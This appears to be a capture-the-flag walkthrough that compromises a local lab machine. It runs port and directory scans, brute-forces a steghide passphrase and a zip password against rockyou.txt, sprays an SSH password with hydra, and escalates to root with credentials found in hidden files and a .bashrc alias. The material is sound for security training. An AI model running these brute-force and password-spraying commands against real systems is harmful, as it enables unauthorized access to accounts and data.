Port Scanning
A full TCP port scan (-p0- covers every port from 0 to 65535) against the target:
export TARGET_IP=172.17.0.2
nmap -p0- $TARGET_IP
PORT STATE SERVICE
22/tcp open ssh
80/tcp open http
Web Server Enumeration
gobuster dir -u http://$TARGET_IP -w /usr/share/wordlists/dirb/common.txt
/scripts (Status: 301) [Size: 310] [--> http://$TARGET_IP/scripts/]
Investigating the /scripts/ Directory
Further investigation of the /scripts/ directory revealed two elements:
- put.php: a PHP file.
- upload/: an empty directory.
Accessing http://$TARGET_IP/scripts/put.php directly in a web browser returned a 405 (Method Not Allowed) error. A browser sends a GET request by default, so the script evidently expects a different HTTP method.
- The name put.php strongly suggests that this file is designed to handle HTTP PUT requests.
- The presence of an empty upload/ directory reinforces the hypothesis that this setup is intended for file uploads.
Confirm PUT Request Handling
curl -X PUT http://$TARGET_IP/scripts/put.php
Results
spongebob
The response "spongebob" is ambiguous. It could represent a username, a directory name, or another resource identifier. Further investigation is warranted.
Exploring Potential "spongebob" Resource
Based on the response, we hypothesize that "spongebob" might represent a directory or endpoint. We can test this by directly accessing it via the web server.
Visiting http://$TARGET_IP/spongebob/ in a web browser reveals a directory listing.
Contents of /spongebob/
- upload/: a subdirectory containing a single image file, ohnorecallwin.jpg.
The presence of an image file raises the possibility of steganography or other data-hiding techniques being employed.
Analyzing ohnorecallwin.jpg
We begin by downloading the ohnorecallwin.jpg file for analysis.
wget http://$TARGET_IP/spongebob/upload/ohnorecallwin.jpg
Extracting Hidden Data with Steghide
We use steghide to attempt data extraction. Since we don't have an initial passphrase, we iterate through a wordlist; steghide exits non-zero on a wrong passphrase, which is what the loop relies on:
#!/bin/bash
# Try each candidate passphrase from rockyou.txt and stop at the first one steghide accepts.
while IFS= read -r password; do
    # -f overwrites any partially written output file; stdin is redirected so steghide
    # can never consume the wordlist; stderr is silenced to hide per-attempt failures.
    if steghide extract -sf ohnorecallwin.jpg -p "$password" -f </dev/null 2>/dev/null; then
        echo "Success with password: $password"
        break # Exit the loop after successful extraction
    fi
done < /usr/share/wordlists/rockyou.txt
This loop forks one steghide process per candidate, so it is slow on a list the size of rockyou.txt (stegseek performs the same search far faster). Here the passphrase turns up early, and it is the very string put.php returned:
wrote extracted data to "seguro.zip".
Success with password: spongebob
Unzipping seguro.zip
The extracted seguro.zip archive is password-protected. We employ fcrackzip with rockyou.txt for a dictionary attack (-u verifies each candidate with unzip to avoid false positives):
fcrackzip -u -D -p /usr/share/wordlists/rockyou.txt seguro.zip
This yields the password for seguro.zip:
PASSWORD FOUND!!!!: pw == chocolate
We then unzip the archive:
unzip seguro.zip
Archive: seguro.zip
[seguro.zip] secreto.txt password:
inflating: secreto.txt
Extracting the Hidden Message
The contents of secreto.txt are:
cat secreto.txt
aprendemos
The extracted message "aprendemos" is likely a credential or part of a credential, possibly a password or keyword.
SSH Username Enumeration and Exploitation
Given that port 22 (SSH) is open and we have a potential password ("aprendemos"), we attempt to find the username it belongs to by spraying that single password across a list of usernames with hydra.
Wordlist Selection:
For username enumeration, specialized wordlists are more effective than general password lists like rockyou.txt. The SecLists project (https://github.com/danielmiessler/SecLists) offers a comprehensive collection of username lists under its Usernames directory. In this case we use xato-net-10-million-usernames.txt from SecLists.
Hydra Command for Username Enumeration:
-L supplies the username list, -p the single known password, and -f stops the run at the first valid login. Against SSH, hydra itself recommends a low task count (-t 4) to avoid dropped connections; a 10-million-entry list will take a long time otherwise.
hydra -L ~/Downloads/xato-net-10-million-usernames.txt -p aprendemos ssh://172.17.0.2 -f
Results:
[22][ssh] host: 172.17.0.2 login: rosa password: aprendemos
SSH Access and Initial Foothold
Using the discovered credentials, we establish an SSH connection:
ssh rosa@$TARGET_IP
Exploring Rosa's Home Directory:
Upon successful login, we find a directory with the unusual name - (a single hyphen). A bare cd - would switch to the previous working directory, so the path has to be given explicitly:
cd ./-
Listing the directory contents reveals numerous files and directories following a pattern:
ls
buscaelpass1 buscaelpass14 buscaelpass19 buscaelpass23 buscaelpass28 buscaelpass32 buscaelpass37 buscaelpass41 buscaelpass46 buscaelpass50 buscaelpass55 buscaelpass6 buscaelpass64 buscaelpass8
buscaelpass10 buscaelpass15 buscaelpass2 buscaelpass24 buscaelpass29 buscaelpass33 buscaelpass38 buscaelpass42 buscaelpass47 buscaelpass51 buscaelpass56 buscaelpass60 buscaelpass65 buscaelpass9
buscaelpass11 buscaelpass16 buscaelpass20 buscaelpass25 buscaelpass3 buscaelpass34 buscaelpass39 buscaelpass43 buscaelpass48 buscaelpass52 buscaelpass57 buscaelpass61 buscaelpass66 creararch.sh
buscaelpass12 buscaelpass17 buscaelpass21 buscaelpass26 buscaelpass30 buscaelpass35 buscaelpass4 buscaelpass44 buscaelpass49 buscaelpass53 buscaelpass58 buscaelpass62 buscaelpass67
buscaelpass13 buscaelpass18 buscaelpass22 buscaelpass27 buscaelpass31 buscaelpass36 buscaelpass40 buscaelpass45 buscaelpass5 buscaelpass54 buscaelpass59 buscaelpass63 buscaelpass7
We also find a script named creararch.sh.
Analyzing creararch.sh:
cat creararch.sh
The script's contents are:
#!/bin/bash
# Look for directories whose names start with "busca"
for directorio in busca*; do
    # Check that the directory exists
    if [ -d "$directorio" ]; then
        # Create 50 files and fill each with the content xx
        for i in {1..50}; do
            touch "$directorio/archivo$i" && echo "xxxxxx:xxxxxx" > "$directorio/archivo$i"
        done
        echo "Se crearon 50 archivos en $directorio"
    else
        echo "El directorio $directorio no existe"
    fi
done
This script creates 50 files within each directory starting with "busca" and writes the string "xxxxxx:xxxxxx" into each of them (the messages it prints translate to "Created 50 files in <dir>" and "The directory <dir> does not exist").
Identifying Files with Anomalous Content
We can infer that one of these files contains something other than the filler, such as credentials. The filler line is 13 characters plus the newline that echo appends, so every file creararch.sh produces is exactly 14 bytes. We devise a script that reports any file whose size deviates from that (alternatively, we could filter out lines matching "xxxxxx:xxxxxx" with grep):
#!/bin/bash
# Loop through all "buscaelpass" directories
for dir in buscaelpass*; do
    # Loop through all files in each directory
    for file in "$dir"/*; do
        # Get the size of the file in bytes
        size=$(stat -c %s "$file")
        # Report anything that is not the 14-byte filler file
        if [[ "$size" != "14" ]]; then
            echo "Found file with different size: $file"
            # Optionally, display the file content:
            cat "$file"
        fi
    done
done
Found file with different size: buscaelpass33/archivo21
pedro:ell0c0
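The size check above works because every filler file is exactly 14 bytes, but it would miss a planted line that happens to be the same length. The following is an added example, not the walkthrough's own script: it rebuilds the layout creararch.sh produces in a scratch directory (constructed data, hypothetical credential strings), plants two divergent files, and locates them both by size and by content, showing which method catches which.

```bash
#!/bin/bash
# Added example (not from the walkthrough): rebuild the tree creararch.sh
# produces in a scratch directory, plant two divergent files, and locate
# them by size and by content. All data here is constructed for the demo.
set -eu

FILLER='xxxxxx:xxxxxx'   # 13 characters; echo appends a newline -> 14 bytes on disk

# build_tree ROOT NDIRS: NDIRS directories named buscaelpass<n> with 50 filler
# files each, mirroring what creararch.sh does on the target.
build_tree() {
    root="$1"; ndirs="$2"
    n=1
    while [ "$n" -le "$ndirs" ]; do
        dir="$root/buscaelpass$n"
        mkdir -p "$dir"
        i=1
        while [ "$i" -le 50 ]; do
            echo "$FILLER" > "$dir/archivo$i"
            i=$((i + 1))
        done
        n=$((n + 1))
    done
    # Planted file 1: a 13-byte credential (hypothetical), caught by the size check.
    echo 'pedro:ell0c0' > "$root/buscaelpass3/archivo21"
    # Planted file 2: same 14-byte length as the filler, so only a content check sees it.
    echo 'oculto:abc123' > "$root/buscaelpass1/archivo7"
}

# find_by_size ROOT: files whose size is not exactly 14 bytes (what the
# walkthrough's stat loop does, expressed with find's -size predicate).
find_by_size() {
    find "$1" -type f ! -size 14c | sort
}

# find_by_content ROOT: files containing at least one line that is not exactly
# the filler string (-v inverts the match, -x matches whole lines, -l lists files).
find_by_content() {
    grep -rlvx "$FILLER" "$1" | sort
}

main() {
    root=$(mktemp -d)
    build_tree "$root" 5
    echo "== by size (misses same-length replacements) =="
    find_by_size "$root" | while IFS= read -r f; do printf '%s: %s\n' "$f" "$(cat "$f")"; done
    echo "== by content (catches both) =="
    find_by_content "$root" | while IFS= read -r f; do printf '%s: %s\n' "$f" "$(cat "$f")"; done
    rm -rf "$root"
}
main
```

The content check is the more robust of the two on a live box: it does not depend on knowing the exact filler length, and it also flags files where a credential was appended after the filler rather than replacing it.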
Privilege Escalation: pedro
su pedro
Password: ell0c0
In pedro's home directory we find a hidden directory named ... (three dots; because its name starts with a dot it is only listed by ls -a). Inside it is a file called .misecreto:
cd .../
cat .misecreto
> Consegui el pass de juan y lo tengo escondido en algun lugar del sistema fuera de mi home.
Translation: "I got juan's password and I have it hidden somewhere on the system outside my home."
Locating Juan's Password:
We search the whole filesystem for regular files owned by pedro, dropping the /proc entries (kernel pseudo-files, not real files) and suppressing permission errors:
find / -type f -user pedro 2>/dev/null | grep -v "proc"
This command reveals several files, including a particularly interesting one:
/home/pedro/.../.misecreto
/home/pedro/.bashrc
/home/pedro/.bash_logout
/home/pedro/.profile
/home/pedro/.cache/motd.legal-displayed
/var/mail/.pass_juan
We examine the contents of /var/mail/.pass_juan:
cat /var/mail/.pass_juan
ZWxwcmVzaW9uZXMK
The content "ZWxwcmVzaW9uZXMK" is Base64 (decoding it with base64 -d gives elpresiones followed by a newline; the trailing K is that newline). The walkthrough moves on to juan without decoding it:
su juan
Privilege Escalation: juan
We find an interesting file named .ordenes_nuevas in juan's home directory:
cat .ordenes_nuevas
> Hola soy tu patron y me canse y me fui a casa te dejo mi pass en un lugar a mano consiguelo y acaba el trabajo.
Translation: "Hi, I'm your boss. I got tired and went home; I'm leaving my password somewhere within reach, get it and finish the job."
This message suggests that juan's boss has left his password somewhere easily accessible. We inspect juan's .bashrc file:
nano .bashrc
The file reveals an unusual alias:
# some more ls aliases
alias ll='ls -alF'
alias la='ls -A'
alias pass='eljefe'
alias l='ls -CF'
The alias pass='eljefe' is highly suspicious, suggesting that "eljefe" (Spanish for "the boss") is a password.
Privilege Escalation: root
We attempt to use the discovered password to escalate to root:
su root
Password: eljefe
The password "eljefe" is accepted, granting us root privileges:
id
uid=0(root) gid=0(root) groups=0(root)